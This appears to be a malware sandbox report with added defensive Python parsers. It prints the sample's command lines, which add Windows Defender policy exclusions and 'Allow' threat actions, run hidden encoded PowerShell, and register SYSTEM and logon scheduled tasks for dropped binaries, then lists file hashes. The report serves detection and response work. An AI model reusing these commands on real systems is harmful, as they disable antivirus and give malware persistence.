C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:64
PID:5056

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
PID:2768

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
PID:5004

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
PID:1208

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
PID:4736

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:32
PID:4848

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:64
PID:5048

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:32
PID:4404

C:\Windows\SysWOW64\reg.exe [tree depth 3]
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:64
PID:2804
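The registry writes above do not touch Defender's local preferences at all: they go to the Group Policy branch (HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\...), which Defender applies as policy, and each value is written twice so that both the 32-bit and 64-bit registry views carry it. A ThreatIDDefaultAction value of 6 is the documented "Allow" action, so every threat ID listed is allowed once policy is refreshed (the gpupdate /force that the scheduled task below triggers), and the Exclusions\Paths entries cover exactly the Program Files (x86), ProgramData, Temp and browser-extension directories the sample drops files into later in the tree. The following Python is an added example, not part of this sandbox report: it parses such reg ADD lines as they appear in process-creation telemetry and summarises what they change. The input lines are copied from the tree above, apart from the last one, which is a constructed benign write used as a control; the action-code table is Microsoft's documented ThreatIDDefaultAction set.

```python
"""Summarise Windows Defender policy writes found in reg ADD command lines.

Added example, not part of the sandbox report. The sample command lines are
copied from the report except the final constructed control line.
"""
import re

# Documented ThreatIDDefaultAction action codes (Defender ADMX / CSP policy).
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}

# `reg ADD "<key>" <options>` as seen in telemetry; the key is always quoted here.
REG_ADD_RE = re.compile(r'\breg(?:\.exe)?"?\s+ADD\s+"(?P<key>[^"]+)"(?P<rest>.*)$',
                        re.IGNORECASE)
# /v, /t and /d take a following value (quoted or bare); /reg:32|64 picks the
# registry view. /f has no value and is simply not matched.
OPT_RE = re.compile(r'/(?P<opt>reg|v|t|d):?\s*(?:"(?P<q>[^"]*)"|(?P<u>\S+))',
                    re.IGNORECASE)


def parse_reg_add(cmdline):
    """Return {key, name, type, data, view} for a reg ADD command line, else None."""
    m = REG_ADD_RE.search(cmdline)
    if m is None:
        return None
    opts = {}
    for o in OPT_RE.finditer(m.group("rest")):
        opts[o.group("opt").lower()] = o.group("q") if o.group("q") is not None else o.group("u")
    return {"key": m.group("key"), "name": opts.get("v"), "type": opts.get("t"),
            "data": opts.get("d"), "view": opts.get("reg", "default")}


def summarize(cmdlines):
    """Group Defender policy writes by effect.

    threats:        {threat_id: {"action": <name>, "views": {"32", "64", ...}}}
    excluded_paths: {path: {views}}
    other:          parsed reg ADD entries that do not touch Defender policy
    """
    threats, excluded, other = {}, {}, []
    for line in cmdlines:
        e = parse_reg_add(line)
        if e is None:
            continue
        key = e["key"].lower()
        if key.endswith(r"\windows defender\threats\threatiddefaultaction"):
            t = threats.setdefault(e["name"], {"action": None, "views": set()})
            t["action"] = THREAT_ACTIONS.get(e["data"], "unknown:%s" % e["data"])
            t["views"].add(e["view"])
        elif key.endswith(r"\windows defender\exclusions\paths"):
            excluded.setdefault(e["name"], set()).add(e["view"])
        else:
            other.append(e)
    return {"threats": threats, "excluded_paths": excluded, "other": other}


# Command lines copied from the process tree (the cmd.exe wrapper and its reg.exe
# child both show up in telemetry and are deduplicated by the dict/set structure).
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:32',
    # Constructed benign control line, not from the report.
    r'reg.exe ADD "HKCU\Software\ExampleVendor" /v InstallPath /t REG_SZ /d "C:\Program Files\Example" /f',
]

if __name__ == "__main__":
    result = summarize(SAMPLE_CMDLINES)
    for tid, info in result["threats"].items():
        print("threat %s -> %s (views %s)" % (tid, info["action"], sorted(info["views"])))
    for path, views in result["excluded_paths"].items():
        print("excluded %s (views %s)" % (path, sorted(views)))
    print("%d unrelated reg ADD line(s)" % len(result["other"]))
```

On a suspect host the same facts can be read back directly with Get-ItemProperty on the two policy keys and compared against the ExclusionPath output of Get-MpPreference; a threat ID set to 6 or a policy exclusion pointing at a randomly named Temp or ProgramData directory is a strong indicator on its own, before any dropped binary is recovered.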
C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "gqGXyUtcu" /SC once /ST 06:42:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
PID:1532

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /run /I /tn "gqGXyUtcu"
PID:3236

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /DELETE /F /TN "gqGXyUtcu"
PID:3536

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "eKTzntQiDjkvtKkfQ" /SC once /ST 11:15:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe\" qB /Zgsite_idObI 385118 /S" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1220

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /run /I /tn "eKTzntQiDjkvtKkfQ"
PID:1232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE [tree depth 1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432

C:\Windows\system32\gpupdate.exe [tree depth 2]
"C:\Windows\system32\gpupdate.exe" /force
PID:4464

C:\Windows\system32\svchost.exe [tree depth 1]
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
PID:2856

C:\Windows\system32\svchost.exe [tree depth 1]
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
PID:4956

C:\Windows\system32\gpscript.exe [tree depth 1]
gpscript.exe /RefreshSystemParam
PID:4488
C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe [tree depth 1]
C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe qB /Zgsite_idObI 385118 /S
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3912

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /DELETE /F /TN "bjzvzwrptCEFdBfgJx"
PID:3772

C:\Windows\SysWOW64\cmd.exe [tree depth 2]
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
PID:4900

C:\Windows\SysWOW64\forfiles.exe [tree depth 3]
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
PID:1420

C:\Windows\SysWOW64\cmd.exe [tree depth 4]
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
PID:1368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [tree depth 5]
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\SysWOW64\Wbem\WMIC.exe [tree depth 6]
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "azeUktJAaUwkEYH" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2320

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "azeUktJAaUwkEYH2" /F /xml "C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml" /RU "SYSTEM"
- Creates scheduled task(s)
PID:4136

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /END /TN "azeUktJAaUwkEYH"
PID:1656

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /DELETE /F /TN "azeUktJAaUwkEYH"
PID:3716

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "OSQnjExwMsDOMr" /F /xml "C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml" /RU "SYSTEM"
- Creates scheduled task(s)
PID:4436

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "KAxEQLlfNMoXA2" /F /xml "C:\ProgramData\hdPjkOXNzukcsjVB\cntsWEX.xml" /RU "SYSTEM"
- Creates scheduled task(s)
PID:4664

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "KELEMENFVUYfdfdjp2" /F /xml "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml" /RU "SYSTEM"
- Creates scheduled task(s)
PID:4112

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "hcXcPAZNWkBjDRtiAcA2" /F /xml "C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml" /RU "SYSTEM"
- Creates scheduled task(s)
PID:2264

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /CREATE /TN "CtcwvJUdbvqSdFcLs" /SC once /ST 17:52:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll\",#1 /QIsite_idWIB 385118" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1892

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /run /I /tn "CtcwvJUdbvqSdFcLs"
PID:1112

C:\Windows\SysWOW64\schtasks.exe [tree depth 2]
schtasks /DELETE /F /TN "eKTzntQiDjkvtKkfQ"
PID:2408

C:\Windows\system32\rundll32.EXE [tree depth 1]
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 385118
PID:4948

C:\Windows\SysWOW64\rundll32.exe [tree depth 2]
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 385118
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:4916

C:\Windows\SysWOW64\schtasks.exe [tree depth 3]
schtasks /DELETE /F /TN "CtcwvJUdbvqSdFcLs"
PID:4276
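The scheduled-task activity in the tree carries three things a responder wants to extract quickly. First, the -EncodedCommand argument: PowerShell expects base64 over the UTF-16LE bytes of the script, and the string used here decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which is what makes the Defender policy keys written earlier take effect. Second, the /RU "SYSTEM" tasks whose action is either a dropped executable in C:\Windows\Temp or a rundll32 export call (",#1") into a dropped DLL, including the ONLOGON task that survives reboot. Third, the tasks registered with /xml from files in the dropped Program Files (x86) and ProgramData directories, whose actions are not visible on the command line at all and have to be read from the XML. The Python below is an added example, not part of this report: the input command lines are copied from the tree above, the option parser covers only the schtasks switches those lines use, and the triage flags are this example's own labels rather than any vendor's detection names.

```python
"""Decode powershell -EncodedCommand payloads and triage schtasks /CREATE lines.

Added example, not part of the sandbox report. SAMPLE_TASKS are command lines
copied from the process tree; the flag names are this example's own.
"""
import base64
import re

ENC_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
CREATE_RE = re.compile(r'\bschtasks(?:\.exe)?"?\s+/create\b', re.IGNORECASE)
# Quoted values may contain \" pairs (the report shows nested quoting inside /TR).
OPT_RE = re.compile(r'/(?P<opt>TN|TR|RU|SC|ST|XML)\s+(?:"(?P<q>(?:[^"\\]|\\.)*)"|(?P<u>\S+))',
                    re.IGNORECASE)
# Directories any user or installer can write to; a SYSTEM task pointing here is suspect.
WRITABLE_DIRS = (r"\windows\temp", r"\programdata", r"\appdata\local\temp")


def decode_encoded_command(cmdline):
    """Return the script behind a powershell -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_schtasks_create(cmdline):
    """Options of a `schtasks /CREATE` line as {OPT: value}; None for run/delete/end."""
    if CREATE_RE.search(cmdline) is None:
        return None
    opts = {}
    for m in OPT_RE.finditer(cmdline):
        val = m.group("q") if m.group("q") is not None else m.group("u")
        opts[m.group("opt").upper()] = val.replace('\\"', '"')  # undo \" escaping
    return opts


def triage_task(cmdline):
    """Flag the persistence traits of one /CREATE line, or None if it is not one."""
    t = parse_schtasks_create(cmdline)
    if t is None:
        return None
    action = t.get("TR", "")
    flags = []
    if t.get("RU", "").upper() == "SYSTEM":
        flags.append("runs-as-SYSTEM")
    if t.get("SC", "").upper() == "ONLOGON":
        flags.append("logon-persistence")
    if any(d in action.lower() for d in WRITABLE_DIRS):
        flags.append("action-in-writable-dir")
    if re.search(r"\brundll32\b", action, re.IGNORECASE):
        flags.append("rundll32-export-call")
    decoded = decode_encoded_command(action)
    if decoded is not None:
        flags.append("encoded-powershell")
    if "XML" in t:
        flags.append("task-imported-from-xml")
    return {"name": t.get("TN"), "run_as": t.get("RU"), "trigger": t.get("SC"),
            "action": action, "decoded": decoded, "flags": flags}


# Command lines copied from the process tree; the last one is a /run, not a /CREATE.
SAMPLE_TASKS = [
    r'schtasks /CREATE /TN "gqGXyUtcu" /SC once /ST 06:42:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "eKTzntQiDjkvtKkfQ" /SC once /ST 11:15:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe\" qB /Zgsite_idObI 385118 /S" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "azeUktJAaUwkEYH" /V1 /F',
    r'schtasks /CREATE /TN "azeUktJAaUwkEYH2" /F /xml "C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml" /RU "SYSTEM"',
    r'schtasks /CREATE /TN "CtcwvJUdbvqSdFcLs" /SC once /ST 17:52:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll\",#1 /QIsite_idWIB 385118" /V1 /F',
    r'schtasks /run /I /tn "gqGXyUtcu"',
]

if __name__ == "__main__":
    for line in SAMPLE_TASKS:
        r = triage_task(line)
        if r is None:
            continue
        print("%s run as %s: %s" % (r["name"], r["run_as"], ", ".join(r["flags"]) or "no flags"))
        if r["decoded"]:
            print("  decoded: %s" % r["decoded"])
```

The create/run/delete triplets in the tree (a task is registered, started immediately with /run, then deleted) mean the task itself is gone by the time a responder looks; the process-creation and task-registration events are the durable evidence, which is why this parser works from command lines rather than from the live task list.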
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
MD5: ebc5dd911d60d18866419aa5d21bda06
SHA1: 1860762977cf57cffcf78d0ccc19f2f98d887080
SHA256: 09c5f307856e0740cf6c7a5320939a9b117bb58b35f5fe13319e1e5f1707a3db
SHA512: 01c08e2df9612dc047991e129c86a5e08ffd5e61c28cb48d5029519431fd1bf616a3af513ec2d547314e62bb92e85a958d446b0358080dcaafe32132de7f17e2

Filesize: 2KB
MD5: 0d77523629a6adfdb0982221e53fbc67
SHA1: c7eccf68eefed77f929a4316bd0e3c11f9573755
SHA256: 78f3d2fe4f2c931611b9600ec31b1d69975d30ceec051dea9143beb3998eb01c
SHA512: 0a4d1e2fe4eede33d6334c4aa20a86164da4d521e2d2575e0c46419db8de7ff32d76fbca56311eff52893f61b1fc06dac4bb222c7cecf6b4e94a869b50901846

Filesize: 2KB
MD5: 8d0a21d486dcd77ab10e1804e0348b28
SHA1: a79fb9c55a546c2c154a650bfe05630ebb5278af
SHA256: b2d0283e798b6a410c7d86fd7404997e1ced14c5ee2153bfab80d2261776a032
SHA512: f9ee6f8d4a143a3155739109ad4b1a63c6e63a36f0b89f12d3aac6c10065bd0c2f388749c5a45c8f138b8c9685f088cd153266f7ac7370eb8081a45766061807

Filesize: 2KB
MD5: 32dbe186449b9e95e474a229372a02fb
SHA1: e17a10c3676caa434ad5d6e0aba162f76dfa0cd6
SHA256: d8da474142896decd552581966103be1c743c7a52675a649f8b97e51ffefcb1a
SHA512: 3c953ed4b866dbc8e927133fc447ed4ba87927985a99b9ad921fd05108b9079fa81bb4f3134f05f3fd8702c4ad1833b792bfb2b39a91693813744d3c92b71555

Filesize: 2.0MB
MD5: 3a8199aab1c74eae07fe583af9439e48
SHA1: 28bbd7e62698c90631cd51ab23e773a1a9a2fe1b
SHA256: de3c96adcc032cf625d6811ac747c5189e2dfd7d4b097cb019bbeee552b1f2cb
SHA512: 730d34973229a6a28e0584fae5ac307bb399907061b78563db648877579587fec59dd5eedcab9a565e770806950829a5fa58fb72db00d178e234897186351c3d

Filesize: 2KB
MD5: 45eaebc48b488978ca753bd709465b8c
SHA1: bdccf353bf5f6b4a2210f547a70d79b94e7c7044
SHA256: bbe1d2ca2b6c8b775a6860fd7b1f94eaeb5f4371f7ac98fa73cd571b9ee7aeb2
SHA512: 74a2e98e54fe50123d3bf228a405eaebb22e66388f5e96cfe320c622ebfd27f4b82f4777febd32934464850052e5e406e9419c8d5a51679a2a0a77b49e8dba7f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize: 187B
MD5: 2a1e12a4811892d95962998e184399d8
SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize: 136B
MD5: 238d2612f510ea51d0d3eaa09e7136b1
SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize: 150B
MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1: 6a51537cef82143d3d768759b21598542d683904
SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Filesize: 10KB
MD5: 4a7b328f04beb47b6ac54bcf9d5ae4d3
SHA1: e45aa1edbb79c8148c55b647a9f62de6c961e4e1
SHA256: a5148b8448cd17b6eecf2c997f9cbb40ad8271ac55b0a0215b0c1a979289c850
SHA512: a37a30b3d0fa3770b9bfe92c56e8c5d1d05fd11707d4d16a38ef1fc320da848f447df4a52e34b1bff8a0322519a1dfbf833542ebc13a55a5e5751b1bf0ff36a6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize: 151B
MD5: bd6b60b18aee6aaeb83b35c68fb48d88
SHA1: 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256: b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512: 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Filesize: 11KB
MD5: 95e6fb5db9e2ca61ea5b4309d1aff816
SHA1: 87fd996b8afbc0c159925b6e7238835bba8f22dd
SHA256: bd8fa2732c22533fe8ec7e136276d787e411b664807b49cfe86503e49837186e
SHA512: 179e514f84d59cbfbcf065172f662761c199927d41bc33ea0eded7067659e8f03beba1d5d1085a3c7e1997cb993119f3ea94076c9fa9ff7c84dd3c6fe7079b84

Filesize: 11KB
MD5: f7ea21a8fddaba9501a691d170906825
SHA1: b7ce7dd9b54c9b47f1b5e718450992293ab707d0
SHA256: 8ed5c87fa3283933acf4db8d457a291c12081eca783337cce61a1e52d9b240bc
SHA512: 16aa131666d33ff4b7c0789482707ce29050a2ede1166670ade15d77c7c542261c8de9fcda3e7e26a7ffd9587f5ab4ec36f36a52eeb467ec0c98b537243a66a3

Filesize: 6.7MB
MD5: 0a35bbd6448122353a2d8ea91cff5781
SHA1: 742ec335853eba4e5b41200fa46958328e90cb2f
SHA256: ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA512: 5c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 6KB
MD5: 0fccc75bd9c0494a133798b5b6d398da
SHA1: d7b23c6bf04704834ead0e99a4ac907a652e0719
SHA256: be435e0cfc5a5a78e736bcd57bf76725f5a91e3ce5d099eeeab9084e8deb2682
SHA512: 6443c4d9e07059b032905863b108a62fb4d8749ae3afcdc746e92f7e3abaccadb4accc32dfad893d4bc926769a26beb4836e3c216e9e378342d22de38262f634

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize: 1KB
MD5: 33b19d75aa77114216dbc23f43b195e3
SHA1: 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256: b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512: 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 11KB
MD5: f5caea41ccb7c13988a362ef6b2f3a1c
SHA1: f31ad94f89bd21eb58f73ec83b11613f9ef3f199
SHA256: 1a90087699459e1c6d059bc5739b1a7270c3ebe493778a70bd5b2bbf4194061a
SHA512: db305daae6c012b820da9186f94a6f8a1cc8e1e3e4ba9d7eafa6523b8bc3188310a338750684dd2e062e36e7882dab3892325a3025045d62572c000e118cc65a

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 11KB
MD5: 7cd1fc869c686c660073b9e811a89e3c
SHA1: 67acf340bead8ee326dacbb3f9c9e91775d8adac
SHA256: c6a11f8fc328b7619e240da4d08b884472b562ea5607da2481c32cb8fca87c9c
SHA512: 0a584776f135737967d6d7e61fabb75d78127fb9e2ce734e306db86d337b078b59a41a942f6ed9809fbef203dcd00919abe4eca07effc1b0a65a5e2df3351492

Filesize: 6.4MB
MD5: 09033b0a28848c69df1d9123aa263242
SHA1: ea1f63365ab26e8250eec85496f7b7baab1c5619
SHA256: fc35ae17402f158f5fc7f179d35542c363ca5681c82e72d7f0f59f80f86b2ee7
SHA512: 9e99a8a584f4831bed290361d719e6a9561455d22b9e650d68d970d2258bd7db465edc7b9c9a9e9565aeefbe871e298dba66470c260b51e4482b76d43f13097d

Filesize: 6KB
MD5: fb11ad5cc456952496ec84f9330e7017
